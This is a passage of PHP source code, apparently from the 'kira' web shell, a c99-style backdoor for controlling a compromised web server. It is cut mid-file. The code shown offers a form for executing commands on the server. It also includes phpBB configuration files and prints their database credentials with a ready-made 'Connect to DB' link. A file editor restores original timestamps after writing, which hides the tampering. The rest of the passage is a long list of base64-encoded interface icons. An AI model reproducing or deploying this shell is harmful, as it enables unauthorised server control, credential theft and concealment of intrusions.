2542 echo "<pre>";
2543 $v = explode("|",$r);
2544 echo $v[0]."<br>";
2545 var_dump(unserialize($v[1]));
2546 echo "</pre>";
2547 }
2548 elseif ($ft == "exe")
2549 {
2550 $ext = explode(".",$f);
2551 $c = count($ext)-1;
2552 $ext = $ext[$c];
2553 $ext = strtolower($ext);
2554 $rft = "";
2555 foreach($exeftypes as $k=>$v)
2556 {
2557 if (in_array($ext,$v)) {$rft = $k; break;}
2558 }
2559 $cmd = str_replace("%f%",$f,$rft);
2560 echo "<b>Execute file:</b><form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><input type=\"text\" name=\"cmd\" value=\"".htmlspecialchars($cmd)."\" size=\"".(strlen($cmd)+2)."\"><br>Display in text-area<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\" checked><input type=hidden name=\"d\" value=\"".htmlspecialchars($d)."\"><br><input type=submit name=submit value=\"Execute\"></form>";
2561 }
2562 elseif ($ft == "sdb") {echo "<pre>"; var_dump(unserialize(base64_decode($r))); echo "</pre>";}
2563 elseif ($ft == "code")
2564 {
2565 if (ereg("php"."BB 2.(.*) auto-generated config file",$r))
2566 {
2567 $arr = explode("\n",$r);
2568 if (count($arr == 18))
2569 {
2570 include($d.$f);
2571 echo "<b>phpBB configuration is detected in this file!<br>";
2572 if ($dbms == "mysql4") {$dbms = "mysql";}
2573 if ($dbms == "mysql") {echo "<a href=\"".$surl."act=sql&sql_server=".htmlspecialchars($dbhost)."&sql_login=".htmlspecialchars($dbuser)."&sql_passwd=".htmlspecialchars($dbpasswd)."&sql_port=3306&sql_db=".htmlspecialchars($dbname)."\"><b><u>Connect to DB</u></b></a><br><br>";}
2574 else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by kira. Please, report us for fix.";}
2575 echo "Parameters for manual connect:<br>";
2576 $cfgvars = array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpasswd"=>$dbpasswd);
2577 foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'<br>";}
2578 echo "</b><hr size=\"1\" noshade>";
2579 }
2580 }
2581 echo "<div style=\"border : 0px solid #FFFFFF; padding: 1em; margin-top: 1em; margin-bottom: 1em; margin-right: 1em; margin-left: 1em; background-color: ".$highlight_background .";\">";
2582 if (!empty($white)) {@ob_clean();}
2583 highlight_file($d.$f);
2584 if (!empty($white)) {k1r4exit();}
2585 echo "</div>";
2586 }
2587 elseif ($ft == "download")
2588 {
2589 @ob_clean();
2590 header("Content-type: application/octet-stream");
2591 header("Content-length: ".filesize($d.$f));
2592 header("Content-disposition: attachment; filename=\"".$f."\";");
2593 echo $r;
2594 exit;
2595 }
2596 elseif ($ft == "notepad")
2597 {
2598 @ob_clean();
2599 header("Content-type: text/plain");
2600 header("Content-disposition: attachment; filename=\"".$f.".txt\";");
2601 echo($r);
2602 exit;
2603 }
2604 elseif ($ft == "img")
2605 {
2606 $inf = getimagesize($d.$f);
2607 if (!$white)
2608 {
2609 if (empty($imgsize)) {$imgsize = 20;}
2610 $width = $inf[0]/100*$imgsize;
2611 $height = $inf[1]/100*$imgsize;
2612 echo "<center><b>Size:</b>&nbsp;";
2613 $sizes = array("100","50","20");
2614 foreach ($sizes as $v)
2615 {
2616 echo "<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=img&d=".urlencode($d)."&imgsize=".$v."\">";
2617 if ($imgsize != $v ) {echo $v;}
2618 else {echo "<u>".$v."</u>";}
2619 echo "</a>&nbsp;&nbsp;&nbsp;";
2620 }
2621 echo "<br><br><img src=\"".$surl."act=f&f=".urlencode($f)."&ft=img&white=1&d=".urlencode($d)."\" width=\"".$width."\" height=\"".$height."\" border=\"1\"></center>";
2622 }
2623 else
2624 {
2625 @ob_clean();
2626 $ext = explode($f,".");
2627 $ext = $ext[count($ext)-1];
2628 header("Content-type: ".$inf["mime"]);
2629 readfile($d.$f);
2630 exit;
2631 }
2632 }
2633 elseif ($ft == "edit")
2634 {
2635 if (!empty($submit))
2636 {
2637 if ($filestealth) {$stat = stat($d.$f);}
2638 $fp = fopen($d.$f,"w");
2639 if (!$fp) {echo "<b>Can't write to file!</b>";}
2640 else
2641 {
2642 echo "<b>Saved!</b>";
2643 fwrite($fp,$edit_text);
2644 fclose($fp);
2645 if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);}
2646 $r = $edit_text;
2647 }
2648 }
2649 $rows = count(explode("\r\n",$r));
2650 if ($rows < 10) {$rows = 10;}
2651 if ($rows > 30) {$rows = 30;}
2652 echo "<form action=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."\" method=POST><input type=submit name=submit value=\"Save\">&nbsp;<input type=\"reset\" value=\"Reset\">&nbsp;<input type=\"button\" onclick=\"location.href='".addslashes($surl."act=ls&d=".substr($d,0,-1))."';\" value=\"Back\"><br><textarea name=\"edit_text\" cols=\"122\" rows=\"".$rows."\">".htmlspecialchars($r)."</textarea></form>";
2653 }
2654 elseif (!empty($ft)) {echo "<center><b>Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.</b></center>";}
2655 else {echo "<center><b>Unknown extension (".$ext."), please, select type manually.</b></center>";}
2656 }
2657}
2658}
2659else
2660{
2661 @ob_clean();
2662 $images = array(
2663"arrow_ltr"=>
2664"R0lGODlhJgAWAIAAAAAAAP///yH5BAUUAAEALAAAAAAmABYAAAIvjI+py+0PF4i0gVvzuVxXDnoQ".
2665"SIrUZGZoerKf28KjPNPOaku5RfZ+uQsKh8RiogAAOw==",
2666"back"=>
2667"R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8".
2668"aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqt".
2669"Wg0JADs=",
2670"buffer"=>
2671"R0lGODlhFAAUAKIAAAAAAP////j4+N3d3czMzLKysoaGhv///yH5BAEAAAcALAAAAAAUABQAAANo".
2672"eLrcribG90y4F1Amu5+NhY2kxl2CMKwrQRSGuVjp4LmwDAWqiAGFXChg+xhnRB+ptLOhai1crEmD".
2673"Dlwv4cEC46mi2YgJQKaxsEGDFnnGwWDTEzj9jrPRdbhuG8Cr/2INZIOEhXsbDwkAOw==",
2674"change"=>
2675"R0lGODlhFAAUAMQfAL3hj7nX+pqo1ejy/f7YAcTb+8vh+6FtH56WZtvr/RAQEZecx9Ll/PX6/v3+".
2676"/3eHt6q88eHu/ZkfH3yVyIuQt+72/kOm99fo/P8AZm57rkGS4Hez6pil9oep3GZmZv///yH5BAEA".
2677"AB8ALAAAAAAUABQAAAWf4CeOZGme6NmtLOulX+c4TVNVQ7e9qFzfg4HFonkdJA5S54cbRAoFyEOC".
2678"wSiUtmYkkrgwOAeA5zrqaLldBiNMIJeD266XYTgQDm5Rx8mdG+oAbSYdaH4Ga3c8JBMJaXQGBQgA".
2679"CHkjE4aQkQ0AlSITan+ZAQqkiiQPj1AFAaMKEKYjD39QrKwKAa8nGQK8Agu/CxTCsCMexsfIxjDL".
2680"zMshADs=",
2681"delete"=>
2682"R0lGODlhFAAUAOZZAPz8/NPFyNgHLs0YOvPz8/b29sacpNXV1fX19cwXOfDw8Kenp/n5+etgeunp".
2683"6dcGLMMpRurq6pKSktvb2+/v7+1wh3R0dPnP17iAipxyel9fX7djcscSM93d3ZGRkeEsTevd4LCw".
2684"sGRkZGpOU+IfQ+EQNoh6fdIcPeHh4YWFhbJQYvLy8ui+xm5ubsxccOx8kcM4UtY9WeAdQYmJifWv".
2685"vHx8fMnJycM3Uf3v8rRue98ONbOzs9YFK5SUlKYoP+Tk5N0oSufn57ZGWsQrR9kIL5CQkOPj42Vl".
2686"ZeAPNudAX9sKMPv7+15QU5ubm39/f8e5u4xiatra2ubKz8PDw+pfee9/lMK0t81rfd8AKf///wAA".
2687"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
2688"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5".
2689"BAEAAFkALAAAAAAUABQAAAesgFmCg4SFhoeIhiUfIImIMlgQB46GLAlYQkaFVVhSAIZLT5cbEYI4".
2690"STo5MxOfhQwBA1gYChckQBk1OwiIALACLkgxJilTBI69RFhDFh4HDJRZVFgPPFBR0FkNWDdMHA8G".
2691"BZTaMCISVgMC4IkVWCcaPSi96OqGNFhKI04dgr0QWFcKDL3A4uOIjVZZABxQIWDBLkIEQrRoQsHQ".
2692"jwVFHBgiEGQFIgQasYkcSbJQIAA7",
2693"download"=>
2694"R0lGODlhFAAUALMIAAD/AACAAIAAAMDAwH9/f/8AAP///wAAAP///wAAAAAAAAAAAAAAAAAAAAAA".
2695"AAAAACH5BAEAAAgALAAAAAAUABQAAAROEMlJq704UyGOvkLhfVU4kpOJSpx5nF9YiCtLf0SuH7pu".
2696"EYOgcBgkwAiGpHKZzB2JxADASQFCidQJsMfdGqsDJnOQlXTP38przWbX3qgIADs=",
2697"forward"=>
2698"R0lGODlhFAAUAPIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8".
2699"aLrc/jDK2Qp9xV5WiN5G50FZaRLD6IhE66Lpt3RDbd9CQFSE4P++QW7He7UKPh0IqVw2l0RQSEqt".
2700"WqsJADs=",
2701"home"=>
2702"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzLKysoaGhmZmZgQEBP///wAAAAAAAAAAAAAAAAAA".
2703"AAAAACH5BAEAAAkALAAAAAAUABQAAAR+MMk5TTWI6ipyMoO3cUWRgeJoCCaLoKO0mq0ZxjNSBDWS".
2704"krqAsLfJ7YQBl4tiRCYFSpPMdRRCoQOiL4i8CgZgk09WfWLBYZHB6UWjCequwEDHuOEVK3QtgN/j".
2705"VwMrBDZvgF+ChHaGeYiCBQYHCH8VBJaWdAeSl5YiW5+goBIRADs=",
2706"mode"=>
2707"R0lGODlhHQAUALMAAAAAAP///6CgpN3d3czMzIaGhmZmZl9fX////wAAAAAAAAAAAAAAAAAAAAAA".
2708"AAAAACH5BAEAAAgALAAAAAAdABQAAASBEMlJq70461m6/+AHZMUgnGiqniNWHHAsz3F7FUGu73xO".
2709"2BZcwGDoEXk/Uq4ICACeQ6fzmXTlns0ddle99b7cFvYpER55Z10Xy1lKt8wpoIsACrdaqBpYEYK/".
2710"dH1LRWiEe0pRTXBvVHwUd3o6eD6OHASXmJmamJUSY5+gnxujpBIRADs=",
2711"refresh"=>
2712"R0lGODlhEQAUALMAAAAAAP////Hx8erq6uPj493d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAA".
2713"AAAAACH5BAEAAAwALAAAAAARABQAAAR1kMlJq0Q460xR+GAoIMvkheIYlMyJBkJ8lm6YxMKi6zWY".
2714"3AKCYbjo/Y4EQqFgKIYUh8EvuWQ6PwPFQJpULpunrXZLrYKx20G3oDA7093Esv19q5O/woFu9ZAJ".
2715"R3lufmWCVX13h3KHfWWMjGBDkpOUTTuXmJgRADs=",
2716"search"=>
2717"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzMDAwLKysoaGhnd3d2ZmZl9fX01NTSkpKQQEBP//".
2718"/wAAACH5BAEAAA4ALAAAAAAUABQAAASn0Ml5qj0z5xr6+JZGeUZpHIqRNOIRfIYiy+a6vcOpHOap".
2719"s5IKQccz8XgK4EGgQqWMvkrSscylhoaFVmuZLgUDAnZxEBMODSnrkhiSCZ4CGrUWMA+LLDxuSHsD".
2720"AkN4C3sfBX10VHaBJ4QfA4eIU4pijQcFmCVoNkFlggcMRScNSUCdJyhoDasNZ5MTDVsXBwlviRmr".
2721"Cbq7C6sIrqawrKwTv68iyA6rDhEAOw==",
2722"setup"=>
2723"R0lGODlhFAAUAMQAAAAAAP////j4+OPj493d3czMzMDAwLKyspaWloaGhnd3d2ZmZl9fX01NTUJC".
2724"QhwcHP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA".
2725"ABAALAAAAAAUABQAAAWVICSKikKWaDmuShCUbjzMwEoGhVvsfHEENRYOgegljkeg0PF4KBIFRMIB".
2726"qCaCJ4eIGQVoIVWsTfQoXMfoUfmMZrgZ2GNDPGII7gJDLYErwG1vgW8CCQtzgHiJAnaFhyt2dwQE".
2727"OwcMZoZ0kJKUlZeOdQKbPgedjZmhnAcJlqaIqUesmIikpEixnyJhulUMhg24aSO6YyEAOw==",
2728"small_dir"=>
2729"R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA".
2730"AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp".
2731"/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=",
2732"small_unk"=>
2733"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAIep3BE9mllic3B5iVpjdMvh/MLc+y1U".
2734"p9Pm/GVufc7j/MzV/9Xm/EOm99bn/Njp/a7Q+tTm/LHS+eXw/t3r/Nnp/djo/Nrq/fj7/9vq/Nfo".
2735"/Mbe+8rh/Mng+7jW+rvY+r7Z+7XR9dDk/NHk/NLl/LTU+rnX+8zi/LbV++fx/e72/vH3/vL4/u31".
2736"/e31/uDu/dzr/Orz/eHu/fX6/vH4/v////v+/3ez6vf7//T5/kGS4Pv9/7XV+rHT+r/b+rza+vP4".
2737"/uz0/urz/u71/uvz/dTn/M/k/N3s/dvr/cjg+8Pd+8Hc+sff+8Te+/D2/rXI8rHF8brM87fJ8nmP".
2738"wr3N86/D8KvB8F9neEFotEBntENptENptSxUpx1IoDlfrTRcrZeeyZacxpmhzIuRtpWZxIuOuKqz".
2739"9ZOWwX6Is3WIu5im07rJ9J2t2Zek0m57rpqo1nKCtUVrtYir3vf6/46v4Yuu4WZvfr7P6sPS6sDQ".
2740"66XB6cjZ8a/K79/s/dbn/ezz/czd9mN0jKTB6ai/76W97niXz2GCwV6AwUdstXyVyGSDwnmYz4io".
2741"24Oi1a3B45Sy4ae944Ccz4Sj1n2GlgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
2742"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
2743"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
2744"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
2745"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
2746"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
2747"AAjnACtVCkCw4JxJAQQqFBjAxo0MNGqsABQAh6CFA3nk0MHiRREVDhzsoLQwAJ0gT4ToecSHAYMz".
2748"aQgoDNCCSB4EAnImCiSBjUyGLobgXBTpkAA5I6pgmSkDz5cuMSz8yWlAyoCZFGb4SQKhASMBXJpM".
2749"uSrQEQwkGjYkQCTAy6AlUMhWklQBw4MEhgSA6XPgRxS5ii40KLFgi4BGTEKAsCKXihESCzrsgSQC".
2750"yIkUV+SqOYLCA4csAup86OGDkNw4BpQ4OaBFgB0TEyIUKqDwTRs4a9yMCSOmDBoyZu4sJKCgwIDj".
2751"yAsokBkQADs=",
2752"multipage"=>"R0lGODlhCgAMAJEDAP/////3mQAAAAAAACH5BAEAAAMALAAAAAAKAAwAAAIj3IR".
2753"pJhCODnovidAovBdMzzkixlXdlI2oZpJWEsSywLzRUAAAOw==",
2754"sort_asc"=>
2755"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMa".
2756"SLrcPcE9GKUaQlQ5sN5PloFLJ35OoK6q5SYAOw==",
2757"sort_desc"=>
2758"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMb".
2759"SLrcOjBCB4UVITgyLt5ch2mgSJZDBi7p6hIJADs=",
2760"sql_button_drop"=>
2761"R0lGODlhCQALAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/".
2762"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
2763"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm".
2764"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/".
2765"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm".
2766"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/".
2767"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm".
2768"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/".
2769"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ".
2770"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA".
2771"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ".
2772"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A".
2773"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z".
2774"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAsA".
2775"AAg4AP8JREFQ4D+CCBOi4MawITeFCg/iQhEPxcSBlFCoQ5Fx4MSKv1BgRGGMo0iJFC2ehHjSoMt/".
2776"AQEAOw==",
2777"sql_button_empty"=>
2778"R0lGODlhCQAKAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/".
2779"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
2780"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm".
2781"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/".
2782"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm".
2783"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/".
2784"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm".
2785"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/".
2786"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ".
2787"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA".
2788"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ".
2789"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A".
2790"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z".
2791"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAoA".
2792"AAgjAP8JREFQ4D+CCBOiMMhQocKDEBcujEiRosSBFjFenOhwYUAAOw==",
2793"sql_button_insert"=>
2794"R0lGODlhDQAMAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/".
2795"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
2796"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm".
2797"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/".
2798"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm".
2799"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/".
2800"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm".
2801"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/".
2802"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ".
2803"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA".
2804"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ".
2805"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A".
2806"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z".
2807"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAANAAwA".
2808"AAgzAFEIHEiwoMGDCBH6W0gtoUB//1BENOiP2sKECzNeNIiqY0d/FBf+y0jR48eQGUc6JBgQADs=",
2809"up"=>
2810"R0lGODlhFAAUALMAAAAAAP////j4+OPj493d3czMzLKysoaGhk1NTf///wAAAAAAAAAAAAAAAAAA".
2811"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJq734ns1PnkcgjgXwhcNQrIVhmFonzxwQjnie27jg".
2812"+4Qgy3XgBX4IoHDlMhRvggFiGiSwWs5XyDftWplEJ+9HQCyx2c1YEDRfwwfxtop4p53PwLKOjvvV".
2813"IXtdgwgdPGdYfng1IVeJaTIAkpOUlZYfHxEAOw==",
2814"write"=>
2815"R0lGODlhFAAUALMAAAAAAP///93d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAAAAAAAAAAAAAA".
2816"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze".
2817"EQYQLUAsGgM0Wwt3bCJfQSFx10yyBlJn8RfEMgM9X+3qHWq5iED5yCsMCl111knDpuXfYls+IK61".
2818"LXd+WWEHLUd/ToJFZQOOj5CRjiCBlZaXIBEAOw==",
2819"ext_asp"=>
2820"R0lGODdhEAAQALMAAAAAAIAAAACAAICAAAAAgIAAgACAgMDAwICAgP8AAAD/AP//AAAA//8A/wD/".
2821"/////ywAAAAAEAAQAAAESvDISasF2N6DMNAS8Bxfl1UiOZYe9aUwgpDTq6qP/IX0Oz7AXU/1eRgI".
2822"D6HPhzjSeLYdYabsDCWMZwhg3WWtKK4QrMHohCAS+hABADs=",
2823"ext_mp3"=>
2824"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU".
2825"aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc".
2826"IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=",
2827"ext_avi"=>
2828"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///4CAgMDAwP8AAAAAAAAAAAAAAANM".
2829"WFrS7iuKQGsYIqpp6QiZ1FFACYijB4RMqjbY01DwWg44gAsrP5QFk24HuOhODJwSU/IhBYTcjxe4".
2830"PYXCyg+V2i44XeRmSfYqsGhAAgA7",
2831"ext_cgi"=>
2832"R0lGODlhEAAQAGYAACH5BAEAAEwALAAAAAAQABAAhgAAAJtqCHd3d7iNGa+HMu7er9GiC6+IOOu9".
2833"DkJAPqyFQql/N/Dlhsyyfe67Af/SFP/8kf/9lD9ETv/PCv/cQ//eNv/XIf/ZKP/RDv/bLf/cMah6".
2834"LPPYRvzgR+vgx7yVMv/lUv/mTv/fOf/MAv/mcf/NA//qif/MAP/TFf/xp7uZVf/WIP/OBqt/Hv/S".
2835"Ev/hP+7OOP/WHv/wbHNfP4VzV7uPFv/pV//rXf/ycf/zdv/0eUNJWENKWsykIk9RWMytP//4iEpQ".
2836"Xv/9qfbptP/uZ93GiNq6XWpRJ//iQv7wsquEQv/jRAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
2837"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
2838"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
2839"AAAAAAAAAAAAAAAAAAAAAAeegEyCg0wBhIeHAYqIjAEwhoyEAQQXBJCRhQMuA5eSiooGIwafi4UM".
2840"BagNFBMcDR4FQwwBAgEGSBBEFSwxNhAyGg6WAkwCBAgvFiUiOBEgNUc7w4ICND8PKCFAOi0JPNKD".
2841"AkUnGTkRNwMS34MBJBgdRkJLCD7qggEPKxsJKiYTBweJkjhQkk7AhxQ9FqgLMGBGkG8KFCg8JKAi".
2842"RYtMAgEAOw==",
2843"ext_cmd"=>
2844"R0lGODlhEAAQACIAACH5BAEAAAcALAAAAAAQABAAggAAAP///4CAgMDAwAAAgICAAP//AAAAAANI".
2845"eLrcJzDKCYe9+AogBvlg+G2dSAQAipID5XJDIM+0zNJFkdL3DBg6HmxWMEAAhVlPBhgYdrYhDQCN".
2846"dmrYAMn1onq/YKpjvEgAADs=",
2847"ext_cpp"=>
2848"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANC".
2849"WLPc9XCASScZ8MlKicobBwRkEIkVYWqT4FICoJ5v7c6s3cqrArwinE/349FiNoFw44rtlqhOL4Ra".
2850"Eq7YrLDE7a4SADs=",
2851"ext_ini"=>
2852"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///8DAwICAgICAAP//AAAAAAAAAANL".
2853"aArB3ioaNkK9MNbHs6lBKIoCoI1oUJ4N4DCqqYBpuM6hq8P3hwoEgU3mawELBEaPFiAUAMgYy3VM".
2854"SnEjgPVarHEHgrB43JvszsQEADs=",
2855"ext_diz"=>
2856"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAP///15phcfb6NLs/7Pc/+P0/3J+l9bs".
2857"/52nuqjK5/n///j///7///r//0trlsPn/8nn/8nZ5trm79nu/8/q/9Xt/9zw/93w/+j1/9Hr/+Dv".
2858"/d7v/73H0MjU39zu/9br/8ne8tXn+K6/z8Xj/LjV7dDp/6K4y8bl/5O42Oz2/7HW9Ju92u/9/8T3".
2859"/+L//+7+/+v6/+/6/9H4/+X6/+Xl5Pz//+/t7fX08vD//+3///P///H///P7/8nq/8fp/8Tl98zr".
2860"/+/z9vT4++n1/b/k/dny/9Hv/+v4/9/0/9fw/8/u/8vt/+/09xUvXhQtW4KTs2V1kw4oVTdYpDZX".
